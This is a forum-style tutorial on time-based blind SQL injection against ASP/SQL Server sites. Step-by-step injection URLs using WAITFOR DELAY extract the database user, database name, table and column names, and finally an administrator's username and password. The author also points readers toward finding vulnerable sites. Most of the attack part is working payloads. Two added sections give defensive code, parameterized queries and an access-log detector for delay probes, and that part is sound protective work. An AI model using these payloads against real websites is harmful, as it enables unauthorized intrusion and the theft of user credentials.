Basic blind SQL Injection using (TIME DELAY)

Source: Internet
Author: User

Basic blind SQL injection technique: time delay
 
Blind SQL Injection (time delay)
 
For educational purposes only!
Hello, HF users.
Since no one took the time and effort to make a decent time delay tutorial, I'm doing it.
First of all, what do you need:
 
A website (ASP in this tutorial) that is vulnerable only to blind SQL injection.
Notepad, to store the data you collect while injecting.
And loads of spare time.
 
Finding vulnerable sites: see Kobez's expanding vulnerable collection guide.
 
The two kinds of time delay injection:
 
Integer injection:
 
Code:
www.2cto.com/index.asp?id=1; waitfor delay '00:00:10'--
This line tells the database to wait 10 seconds before it responds.
 
If the database returns directly, we know the condition is false.
If it waits 10 seconds, it is obviously "true".
 
String injection:
Code:
www.2cto.com/index.asp?id=1'; waitfor delay '00:00:10'--
Same thing here, only the string is closed with ' first, as in basic SQLi when you have a string injection.
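The two injection points above share one root cause: the id parameter is pasted straight into the SQL text, so whatever follows "1;" or "1';" is parsed as SQL. The following is an added example, not code from the tutorial, that puts that injectable pattern next to the typed, parameterized form that closes both the integer and the string case. SQLite stands in for the ASP/SQL Server page; the items table, its rows and the function names are assumptions made for the demo.

```python
"""Added example (not from the tutorial): the injectable query pattern next to a
typed, parameterized one. SQLite stands in for the ASP/SQL Server page; the
table, its rows and the function names are assumptions made for this demo."""
import re
import sqlite3

# Constructed stand-in for the page's data.
DEMO_ROWS = [(1, "widget"), (2, "gadget")]


def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", DEMO_ROWS)
    return conn


def build_query_unsafe(raw_id: str) -> str:
    """The pattern the tutorial exploits: the request parameter is pasted into
    SQL text, so a value like "1; waitfor delay '00:00:10'--" turns into a
    second statement. Only the text is built here; nothing is executed."""
    return "SELECT name FROM items WHERE id = " + raw_id


def is_plain_integer(raw_id: str) -> bool:
    """Integer injection point: accept only ASCII digits before the value is used."""
    return re.fullmatch(r"[0-9]+", raw_id) is not None


def lookup_by_id(conn: sqlite3.Connection, raw_id: str):
    """Hardened integer case: validate the type, then bind it as a parameter."""
    if not is_plain_integer(raw_id):
        raise ValueError("id must be a positive integer")
    row = conn.execute("SELECT name FROM items WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


def lookup_by_name(conn: sqlite3.Connection, raw_name: str):
    """Hardened string case: there is nothing to validate numerically, so the
    placeholder does the work. A quote or '--' inside the value stays inside the
    bound string and is compared as data, never parsed as SQL."""
    row = conn.execute("SELECT id FROM items WHERE name = ?", (raw_name,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    probe = "1; waitfor delay '00:00:10'--"
    print("unsafe SQL text:", build_query_unsafe(probe))
    conn = make_demo_db()
    print("typed lookup of '1':", lookup_by_id(conn, "1"))
    print("string lookup with an injected quote:",
          lookup_by_name(conn, "widget'; waitfor delay '00:00:10'--"))
```

The order matters: the integer case is rejected before any SQL is built, and the string case relies on binding rather than on escaping quotes. On SQL Server the same fix is a parameterized ADO command; the application's database login should also not need the permissions that make the later steps of this tutorial (reading sysobjects and information_schema) possible.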
 
Extracting the database username.
 
Well, we have a lot of work to do.
We need to find all the characters. Let's start with one:
Code:
www.2cto.com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'--
Let's explain first. We ask: if (len(user)=1), i.e. does user have one character? If so, waitfor delay '00:00:10':
the database has to wait 10 seconds before it responds. But we all know that in most cases a user is not 1 character long.
 
We will increase (len(user)=1) to (len(user)=2) and so on.
 
Code:
www.2cto.com/index.asp?id=1; IF (len(user)=1) waitfor delay '00:00:10'-- [no delay from db.]
www.2cto.com/index.asp?id=1; IF (len(user)=2) waitfor delay '00:00:10'-- [no delay from db.]
www.2cto.com/index.asp?id=1; IF (len(user)=3) waitfor delay '00:00:10'-- [no delay from db.]
www.2cto.com/index.asp?id=1; IF (len(user)=4) waitfor delay '00:00:10'-- [page waits 10 seconds before it loads.]
 
We have a hit: the database just told us, by waiting 10 seconds, that user has 4 characters.
But what are the characters we seek? :/
 
Getting characters with ASCII and time delay.
As we have seen in my previous tutorial, we are going to use ASCII codes.
These will help us get the characters of the username.
 
97 in ASCII is the letter a; we will increase this number until we get a hit.
For example 97 a, 98 b, 99 c, and so on.
 
How do we do this?
 
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,1,1)))=97) waitfor delay '00:00:10'--
What did I just say?
If the ASCII character code of the character taken from user at
1,1 (this means the 1st character) is 97, which is an a in ASCII, the condition is correct and the database would wait 10 seconds before the page loads.
 
We need 4 characters, so the 1,1 needs to be increased. If we want the second character we need to use 2,1.
 
First character:
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,1,1)))=97) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,1,1)))=98) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,1,1)))=99) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,1,1)))=100) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,1,1)))=101) waitfor delay '00:00:10'-- [10 second delay]
 
The first character is an E. How do I know this:
At 97 I had no delay, which means it's not an a.
At 98 I had none either.
Not at 99, not at 100.
But I did have a 10 second delay at 101, and 101 is e in the ASCII character code.
 
We need the rest of the characters.
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,2,1)))=97) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,2,1)))=98) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,2,1)))=99) waitfor delay '00:00:10'-- [10 second delay]
 
Second character is a C.
Look closely at what changed in the code: 1,1 became 2,1, because I wanted to know the second character of user.
 
Third character:
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,3,1)))=97) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,3,1)))=98) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,3,1)))=99) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,3,1)))=100) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,3,1)))=101) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,3,1)))=102) waitfor delay '00:00:10'-- [10 second delay]
 
Third is an F. Yet again, watch the code: I changed 2,1 into 3,1.
 
Fourth:
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,4,1)))=97) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,4,1)))=98) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,4,1)))=99) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,4,1)))=100) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,4,1)))=101) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(user,4,1)))=102) waitfor delay '00:00:10'-- [10 second delay]
 
Fourth character is yet again an F.
 
We now have the four characters I needed:
ECFF = user.
 
What a hell of a job for 4 characters...
No, no, we are not finished yet.
 
Extracting the db name.
Same as before: the database wants us to do a hell of a job, it's a bitch.
Now let's hope that goddamn administrator likes short names (they don't).
 
We need to know how many characters the db name has. Not much difference.
Code:
www.[site].com/index.asp?id=1; if (len(db_name())=1) waitfor delay '00:00:10'-- [no delay]
I asked the database: does db_name have only one character? The database said no, my admin hates that.
So we need to run down the whole thing again, changing the =1 into =2, =3 and so on,
until it waits 10 seconds.
 
Code:
www.[site].com/index.asp?id=1; if (len(db_name())=3) waitfor delay '00:00:10'-- [10 second delay]
Our db name has 3 characters (in real cases they will probably end up with 8 or 10 characters,
but this is a tutorial; I won't type a million characters. If you did not get it by now, XD, sorry for you).
 
First character.
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),1,1)))=97) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),1,1)))=98) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),1,1)))=99) waitfor delay '00:00:10'-- [10 second delay]
 
First character is C.
 
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),2,1)))=97) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),2,1)))=98) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),2,1)))=99) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),2,1)))=100) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),2,1)))=101) waitfor delay '00:00:10'-- [10 second delay]
 
Second character is an E. Watch the position again: 1,1 changed to 2,1.
 
Code:
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),3,1)))=97) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),3,1)))=98) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),3,1)))=99) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),3,1)))=100) waitfor delay '00:00:10'-- [no delay]
www.[site].com/index.asp?id=1; IF (ascii(lower(substring(db_name(),3,1)))=101) waitfor delay '00:00:10'-- [10 second delay]
 
Last letter is another E.
Db_name = CEE
 
Extracting database tables.
The principle remains the same.
It is easy, but if you want to go out the door once in a while, avoid blind SQLi...
 
We need to know how many characters it has and we need to know which characters it has.
By now you should know the drill.
 
This one has 5 characters.
Code:
www.[site].com/index.asp?id=1; if (len((select top 1 name from sysobjects where xtype='U'))=5) waitfor delay '00:00:10'-- [10 second delay]
 
We need to know the characters.
 
Code:
First is a U.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((select top 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) waitfor delay '00:00:10'-- (+10 seconds)
 
Second an S.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((select top 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) waitfor delay '00:00:10'-- (+10 seconds)
 
Third an E.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((select top 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) waitfor delay '00:00:10'-- (+10 seconds)
 
Fourth an R.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((select top 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) waitfor delay '00:00:10'-- (+10 seconds)
 
Fifth an S.
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((select top 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) waitfor delay '00:00:10'-- (+10 seconds)
 
Table name is USERS.
 
Extracting table column names.
 
How many characters does this column have? We know how it works, people.
Code:
www.2cto.com/index.asp?id=1; IF (len((select top 1 column_name from CEE.information_schema.columns where table_name='users'))=8) waitfor delay '00:00:10'-- [10 second delay]
OK, here we say: select the column name from the database (that's the name we had at the start, DB_NAME), which is CEE. We select it out of the table users we found above.
It has 8 characters.
 
Now we need the characters to build the name.
Code:
First letter is U.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),1,1)))=117) waitfor delay '00:00:10'--
 
Second letter is an S.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),2,1)))=115) waitfor delay '00:00:10'--
 
Third letter is an E.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),3,1)))=101) waitfor delay '00:00:10'--
 
Fourth letter is an R.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),4,1)))=114) waitfor delay '00:00:10'--
 
Fifth letter is an n.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),5,1)))=110) waitfor delay '00:00:10'--
 
Sixth letter is an a.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),6,1)))=97) waitfor delay '00:00:10'--
 
Seventh letter is an m.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),7,1)))=109) waitfor delay '00:00:10'--
 
Eighth letter is an e.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users'),8,1)))=101) waitfor delay '00:00:10'--
 
Column name is username.
 
Now we need to extract the others. In some cases you could have up to 10.
Let's say I only have 2, username and pass, to keep it easy.
 
The second column name has 4 characters.
Code:
www.2cto.com/index.asp?id=1; IF (LEN((select top 1 column_name from CEE.information_schema.columns where table_name='users' and column_name>'user'))=4) waitfor delay '00:00:10'--
 
The characters:
Code:
First letter is P.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users' and column_name>'username'),1,1)))=112) waitfor delay '00:00:10'--
 
Second letter is an a.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users' and column_name>'username'),2,1)))=97) waitfor delay '00:00:10'--
 
Third letter is S.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users' and column_name>'username'),3,1)))=115) waitfor delay '00:00:10'--
 
Fourth letter is S.
www.2cto.com/index.asp?id=1; IF (ASCII(lower(substring((select top 1 column_name from CEE.information_schema.columns where table_name='users' and column_name>'username'),4,1)))=115) waitfor delay '00:00:10'--
 
So we now have the column pass.
 
Looks like we are finally getting somewhere.
We have the columns username and pass! Yay.
But we're not there yet, not yet.
 
Extracting rows from columns.
 
Extracting from column username.
 
Count of characters: 5
Code:
www.2cto.com/index.asp?id=1; IF (LEN((select top 1 username from USERS))=5) waitfor delay '00:00:10'--
What do we do here? We select what's in the column username from table users.
 
We need to extract the characters now:
Code:
First letter is an a.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 username from USERS),1,1))=97) waitfor delay '00:00:10'--
 
Second letter is D.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 username from USERS),2,1))=100) waitfor delay '00:00:10'--
 
Third letter is M.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 username from USERS),3,1))=109) waitfor delay '00:00:10'--
 
Fourth letter is I.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 username from USERS),4,1))=105) waitfor delay '00:00:10'--
 
Fifth letter is N.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 username from USERS),5,1))=110) waitfor delay '00:00:10'--
 
We now have the name admin (the one we need).
 
Extracting from column pass.
 
Code:
www.2cto.com/index.asp?id=1; IF (LEN((select top 1 pass from USERS))=5) waitfor delay '00:00:10'--
 
We need to extract the characters now:
Code:
First letter is e.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 pass from USERS),1,1))=101) waitfor delay '00:00:10'--
 
Second letter is f.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 pass from USERS),2,1))=102) waitfor delay '00:00:10'--
 
Third letter is f.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 pass from USERS),3,1))=102) waitfor delay '00:00:10'--
 
Fourth letter is e.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 pass from USERS),4,1))=101) waitfor delay '00:00:10'--
 
Fifth letter is c.
www.2cto.com/index.asp?id=1; IF (ASCII(substring((select top 1 pass from USERS),5,1))=99) waitfor delay '00:00:10'--
 
Pass = effec
 
Now we have username: admin and his pass effec.
 
Have fun, see ya in about an hour or 5 when you finish :D
Sorry for the bad English!
And I hope you enjoyed my tutorial. Grtz, real steel!
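Where a defender sees the whole procedure above is in the web server's own access log: every length probe and every character probe is a separate request, and the only channel the technique has is the response time. The following is an added example, not part of the tutorial, of a small log detector for exactly that footprint: requests whose query string carries a delay primitive, and bursts of same-shaped requests from one client to one endpoint where at least one response took about as long as the requested delay. The IIS W3C-like field layout, the thresholds and the sample log lines are constructed for the demo.

```python
"""Added example (not from the tutorial): flag time-based blind SQL injection
probes in web server access logs. The log lines below are constructed for this
demo in an IIS W3C-like layout (date time c-ip cs-method cs-uri-stem
cs-uri-query sc-status time-taken in ms); the layout, the thresholds and the
sample values are assumptions, not data from the page."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Delay primitives of common engines; the tutorial's is SQL Server's WAITFOR DELAY.
DELAY_SIGNATURES = ("waitfor delay", "sleep(", "benchmark(", "pg_sleep(")
SLOW_MS = 9000      # a response this slow looks like the ~10 s delay being probed for
MIN_PROBES = 5      # same client, same endpoint, same query shape

# Constructed sample: one client walks len(user) and then the first character
# exactly as the tutorial does; another client runs one legitimately slow report.
SAMPLE_LOG = """\
2010-05-01 10:00:01 10.0.0.5 GET /index.asp id=1 200 35
2010-05-01 10:00:05 10.0.0.5 GET /index.asp id=1;%20IF%20(len(user)=1)%20waitfor%20delay%20'00:00:10'-- 200 41
2010-05-01 10:00:09 10.0.0.5 GET /index.asp id=1;%20IF%20(len(user)=2)%20waitfor%20delay%20'00:00:10'-- 200 38
2010-05-01 10:00:13 10.0.0.5 GET /index.asp id=1;%20IF%20(len(user)=3)%20waitfor%20delay%20'00:00:10'-- 200 40
2010-05-01 10:00:17 10.0.0.5 GET /index.asp id=1;%20IF%20(len(user)=4)%20waitfor%20delay%20'00:00:10'-- 200 10042
2010-05-01 10:00:31 10.0.0.5 GET /index.asp id=1;%20IF%20(ascii(lower(substring(user,1,1)))=97)%20waitfor%20delay%20'00:00:10'-- 200 39
2010-05-01 10:00:35 10.0.0.5 GET /index.asp id=1;%20IF%20(ascii(lower(substring(user,1,1)))=98)%20waitfor%20delay%20'00:00:10'-- 200 37
2010-05-01 10:00:39 10.0.0.5 GET /index.asp id=1;%20IF%20(ascii(lower(substring(user,1,1)))=99)%20waitfor%20delay%20'00:00:10'-- 200 42
2010-05-01 10:00:43 10.0.0.5 GET /index.asp id=1;%20IF%20(ascii(lower(substring(user,1,1)))=100)%20waitfor%20delay%20'00:00:10'-- 200 36
2010-05-01 10:00:47 10.0.0.5 GET /index.asp id=1;%20IF%20(ascii(lower(substring(user,1,1)))=101)%20waitfor%20delay%20'00:00:10'-- 200 10039
2010-05-01 10:01:00 192.168.1.9 GET /index.asp id=7 200 33
2010-05-01 10:01:02 192.168.1.9 GET /report.asp month=5 200 9800
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")


def parse_line(line: str):
    """Split one log line into the fields the detector needs; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    _date, _time, ip, _method, stem, query, status, taken = m.groups()
    return {"ip": ip, "stem": stem, "query": query,
            "status": int(status), "ms": int(taken)}


def normalize(query: str) -> str:
    """URL-decode, lowercase, drop inline comments and collapse whitespace so
    spacing differences do not hide a keyword."""
    q = re.sub(r"/\*.*?\*/", " ", unquote_plus(query).lower())
    return re.sub(r"\s+", " ", q)


def has_delay_signature(query: str) -> bool:
    q = normalize(query)
    return any(sig in q for sig in DELAY_SIGNATURES)


def query_shape(query: str) -> str:
    """Replace digit runs with '#': character-by-character probing sends many
    requests that differ only in the numbers being compared."""
    return re.sub(r"\d+", "#", normalize(query))


def analyze(log_text: str):
    """Return (rule, client ip, uri stem, detail) tuples for suspicious traffic."""
    findings = []
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if has_delay_signature(rec["query"]):
            findings.append(("signature", rec["ip"], rec["stem"], rec["query"]))
        groups[(rec["ip"], rec["stem"], query_shape(rec["query"]))].append(rec["ms"])
    # Behavioural rule: a burst of same-shaped requests, at least one of which
    # took about as long as the delay an attacker would ask for. A single slow
    # report page is not enough on its own.
    for (ip, stem, shape), times in groups.items():
        if len(times) >= MIN_PROBES and max(times) >= SLOW_MS:
            findings.append(("probe-sequence", ip, stem, shape))
    return findings


def flagged_clients(log_text: str):
    return sorted({f[1] for f in analyze(log_text)})


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

The signature rule is the cheap one and fires on every probe in the sample. The shape rule is the one worth keeping when the keyword is not visible (a delay primitive the list does not know, or a POST body that is not logged): the tutorial walks a counter one step at a time, so the requests differ only in digits, and the timing has to show up in time-taken because it is the only answer channel. Neither rule replaces the fix; parameterized queries and a low-privilege database login remove the channel, and the log rules are there to tell you someone tried.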
